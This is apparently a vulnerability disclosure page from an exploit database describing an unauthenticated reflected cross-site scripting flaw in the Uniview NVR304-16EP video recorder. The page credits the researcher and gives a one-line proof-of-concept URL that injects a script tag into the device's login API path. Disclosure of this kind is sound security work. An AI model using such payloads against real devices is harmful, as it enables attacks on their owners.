Network Video Recorder NVR304-16EP Cross Site Scripting

2022.02.16
Credit: Luis Martinez
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated) # Author: Luis Martinez # Discovery Date: 2022-02-13 # Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features # Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568 # Tested Version: NVR304-16EP # Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr # Vulnerability Type: Reflected Cross-Site Scripting (XSS) # CVE: N/A # Proof of Concept: http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top